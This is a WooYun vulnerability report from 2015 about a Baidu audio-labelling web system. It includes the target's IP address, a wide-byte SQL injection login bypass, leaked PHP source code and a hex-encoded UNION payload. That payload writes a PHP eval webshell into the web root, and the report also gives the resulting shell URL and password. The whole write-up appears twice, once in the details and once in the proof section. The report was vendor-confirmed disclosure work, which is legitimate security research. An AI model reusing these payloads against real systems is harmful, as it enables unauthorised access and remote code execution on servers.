当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157024

漏洞标题:百度某系统SQL注入到Getshell

相关厂商:百度

漏洞作者: 玉林嘎

提交时间:2015-11-30 13:29

修复时间:2016-01-14 18:46

公开时间:2016-01-14 18:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

我又来了

详细说明:

http://115.239.210.62:8080 百度一个关于音频的系统
页面gbk猜测存在宽字节注入

1.png


%df' or 1# bypass登录

2.png


3.png


进入后台就想shell一波 但是完全没有上传的地方
刚好页面有些有warnming 报出路径 还想利用之前方法写波shell

4.png


但是写shell的into outfile '路径' 单引号被转义了 是不行的
后台存在很多注入 尝试读文件试试

6.png


是可以读文件的 那么下面的思路就是审计源码 寻找shell方法

/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php


对上面文件进行读取 简单的增删改查 没有其他多余的操作
注入却无法引入单引号 根据经验 二次注入是可以引入'
接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件
突破点在下面文件

/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php


<?php
require('inc.php');
if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))
{
echo "Warning:deleting".$_SESSION['wav']."failed";
}
if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))
{
echo "Warning:deleting".$_SESSION['pic']."failed";
}
if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
{
echo "Warning:deleting".$_SESSION['adpcm']."failed";
}
if(isset($_GET['jump']))
{
if($_GET['jump']==1)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
}
else if($_GET['jump']==2)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
}
}
if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
{
echo "请您重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
if($_SESSION['auth']==2)
{
$sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
$sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
$chn_type="标注";
else if($_SESSION['work']=="check")
$chn_type="检查";
else
$chn_type="精选";
?>


else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}


$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数
$_SESSION 是在登录赋值的 那么去看下登录文件

/home/audio/label/apache/htdocs/member_login.php


<?php
require_once ('inc.php');
if(empty($_POST['name'])){
echo "用户名不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
//echo "用户名不能为空,自动返回登录界面...</br></br>";
//echo "点击返回<a href='index.php'>登录界面</a>";
// header('Location:http://10.210.26.11:8080/index.php');
exit;
}
else if(empty($_POST['password'])){
echo "密码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}
else if(empty($_POST['yzm'])){
echo "验证码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
$name = mysql_real_escape_string($_POST['name'], $link);
$pw = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
echo "验证码错误,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con);
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
echo "账户不存在,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
$_SESSION['pass'] ="ok";
$_SESSION['num'] =0;
$_SESSION['name'] =$name;
$_SESSION['id'] =$rs->id;
$_SESSION['auth'] =$rs->authority;
$_SESSION['rname'] =$rs->real_name;
$_SESSION['gender'] =$rs->Gender;
$_SESSION['mobile'] =$rs->Mobile;
$_SESSION['ikey'] =$rs->Ikey;
$_SESSION['mail'] =$rs->Mail;
$_SESSION['type'] =$_POST['type'];
$time =date('U');
$ip ="";
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else{
$ip=$_SERVER['REMOTE_ADDR'];
}


$_SESSION['auth']     =$rs->authority;


$rs又是根据

$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"


查询出来的
那么登录的时候利用联合查询直接控制authority 即可
name只需传入下面代码即可

test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#


0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'


通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'
进入之后访问 user_work.php 文件即可
最后生成shell http://115.239.210.62:8080/label/test.php 密码:s

QQ图片20151130132632.png


内网 未深入

漏洞证明:

http://115.239.210.62:8080 百度一个关于音频的系统
页面gbk猜测存在宽字节注入

1.png


%df' or 1# bypass登录

2.png


3.png


进入后台就想shell一波 但是完全没有上传的地方
刚好页面有些有warnming 报出路径 还想利用之前方法写波shell

4.png


但是写shell的into outfile '路径' 单引号被转义了 是不行的
后台存在很多注入 尝试读文件试试

6.png


是可以读文件的 那么下面的思路就是审计源码 寻找shell方法

/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php


对上面文件进行读取 简单的增删改查 没有其他多余的操作
注入却无法引入单引号 根据经验 二次注入是可以引入'
接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件
突破点在下面文件

/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php


<?php
require('inc.php');
if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))
{
echo "Warning:deleting".$_SESSION['wav']."failed";
}
if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))
{
echo "Warning:deleting".$_SESSION['pic']."failed";
}
if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
{
echo "Warning:deleting".$_SESSION['adpcm']."failed";
}
if(isset($_GET['jump']))
{
if($_GET['jump']==1)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
}
else if($_GET['jump']==2)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
}
}
if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
{
echo "请您重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
if($_SESSION['auth']==2)
{
$sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
$sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
$chn_type="标注";
else if($_SESSION['work']=="check")
$chn_type="检查";
else
$chn_type="精选";
?>


else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}


$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数
$_SESSION 是在登录赋值的 那么去看下登录文件

/home/audio/label/apache/htdocs/member_login.php


<?php
require_once ('inc.php');
if(empty($_POST['name'])){
echo "用户名不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
//echo "用户名不能为空,自动返回登录界面...</br></br>";
//echo "点击返回<a href='index.php'>登录界面</a>";
// header('Location:http://10.210.26.11:8080/index.php');
exit;
}
else if(empty($_POST['password'])){
echo "密码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}
else if(empty($_POST['yzm'])){
echo "验证码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
$name = mysql_real_escape_string($_POST['name'], $link);
$pw = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
echo "验证码错误,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con);
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
echo "账户不存在,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
$_SESSION['pass'] ="ok";
$_SESSION['num'] =0;
$_SESSION['name'] =$name;
$_SESSION['id'] =$rs->id;
$_SESSION['auth'] =$rs->authority;
$_SESSION['rname'] =$rs->real_name;
$_SESSION['gender'] =$rs->Gender;
$_SESSION['mobile'] =$rs->Mobile;
$_SESSION['ikey'] =$rs->Ikey;
$_SESSION['mail'] =$rs->Mail;
$_SESSION['type'] =$_POST['type'];
$time =date('U');
$ip ="";
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else{
$ip=$_SERVER['REMOTE_ADDR'];
}


$_SESSION['auth']     =$rs->authority;


$rs又是根据

$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"


查询出来的
那么登录的时候利用联合查询直接控制authority 即可
name只需传入下面代码即可

test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#


0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'


通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'
进入之后访问 user_work.php 文件即可
最后生成shell http://115.239.210.62:8080/label/test.php 密码:s

QQ图片20151130132632.png


内网 未深入

修复方案:

登录之后全是注入哎。

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-30 18:45

厂商回复:

感谢关注百度安全!

最新状态:

暂无